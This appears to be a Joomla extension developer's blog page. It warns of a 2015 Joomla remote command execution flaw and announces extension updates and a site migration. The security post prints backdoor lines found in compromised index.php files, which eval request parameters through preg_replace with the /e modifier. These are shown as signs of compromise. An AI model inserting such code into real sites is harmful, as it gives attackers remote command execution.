There is a serious vulnerability that can be easily exploited and is already in the wild. It affects all versions from 1.5 to 3.4. Details here: Critical 0-day Remote Command Execution Vulnerability in Joomla

If you are using Joomla 3, please update immediately to Joomla 3.4.6.

Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are being handled (details here). As such, some of your extensions might no longer work after upgrading to Joomla 3.4.7. Would suggest you update to Joomla 3.4.6 first and do some testing to make sure all extensions are working before you update to Joomla 3.4.7.

How to Check

I have quite a number of friends who are being hit by this.

Some signs of being attacked are as follows. Take at look at your <Joomla_Root_Folder>/index.php OR <Joomla_Root_Folder>/includes/framework.php. If you see any of the following in the first few lines of the code, then your site is being hit.

1. The following from <Joomla_Root_Folder>/index.php:

<?php

if (isset($_REQUEST["gf"])) {/*xncVpILmY*/@preg_replace('/(.*)/e', @$_REQUEST['gf'], '');}

if (isset($_REQUEST["Ix"])) {@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}

if (isset($_REQUEST["Ps"])) {/*CzwNjYUj*/@preg_replace('/(.*)/e', @$_REQUEST['Ps'], '');/*wEKRfiiQ*/}

if (isset($_REQUEST["Ix"])) {/*NemlUoamst*/@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}

if (isset($_REQUEST["LyYE"])) {@preg_replace('/(.*)/e', @$_REQUEST['LyYE'], '');}


/**
 * @package    Joomla.Site
 *
 * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

2. The following from <Joomla_Root_Folder>/includes/framework.php:

<?php if(stripos($_SERVER["HTTP_USER_AGENT"], "JDatabaseDriverMysqli") !== false || stripos($_SERVER["HTTP_X_FORWARDED_
FOR"], "JDatabaseDriverMysqli") !== false) exit;
/**
 * @package    Joomla.Site
 *
 * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

If you are using the googleSearch (CSE) component , please update this component with the latest version immediately!

This latest version resolves potential Cross Site Scripting as highlighted by joomla.org. Details here.

If you are using this component (any versions, including Joomla 1,0, 1,5, 1.6, 1.7, 2.6 and 3.0 and above), please MAKE SURE you update to the latest version immediately.

Special thanks to Eddie Konczal for highlighting this to me.

Thanks to Jim who alerted me of a recent Joomla bug report related to DirectPHP.

If you're using DirectPHP, it was found that SQL statements from Article Body are EXECUTED when displaying Category List containing the Articles.

Details in this link: http://issues.joomla.org/tracker/joomla-cms/7625

Have just released googleMaps module v3.0.1 which works with the latest Joomla 3.4.3.

For Joomla 3.4 and higher, modules that have capital letters in their elements are now forced to lowercase during module installs (as a result of some standardisation in the installer). This results in case sensitive systems with the XML file being unable to be found. Details here.

Have renamed all googleMaps to googlemaps, and everything now works.

Special thanks to Matteo for informing me about this.

Download here: mod_googlemaps_v3.01.zip

Warm Regards,
/kksou

The Google Geocoder v2.0 is up and running again!

This useful tool is for you to find the exact Longitude and Latitude of any place that might not be given accurately by the Google Map.

Google Geocoder v2.0: http://www.kksou.com/php-gtk2/google-geocoder-v2/

All the 514 PHP-GTK2 sample codes are now up and running!

You can view them here: PHP-GTK2 Sample Codes.

Please do let me know if you find any broken links or images, ok?

Warm Regards,
/kksou

Dear All,

Have received quite a number of messages from people asking me where are the PHP-GTK2 sample codes?

Yes, the migration takes a bit longer due to some hiccups. Really sorry about this.

I wrote all these PHP-GTK2 sample codes starting 2005. I have built some libraries for the running of the website on the previous host which is running PHP5.2. The new host I'm currently on is running PHP 5.4. And some of my PHP libraries do not run on the new host!

Thanks to some of you like Luis Martinez who offers to help in the migration. It's really very kind of you. Thank you!

Please give me a couple more days. I will try to get the PHP-GTK2 sample codes up and running again.

Warm Regards,
/kksou

I'm currently moving kksou.com to a new server with faster speed and responsive design.

Please bear with me while I migrate the contents over...

Warm Regards,
/kksou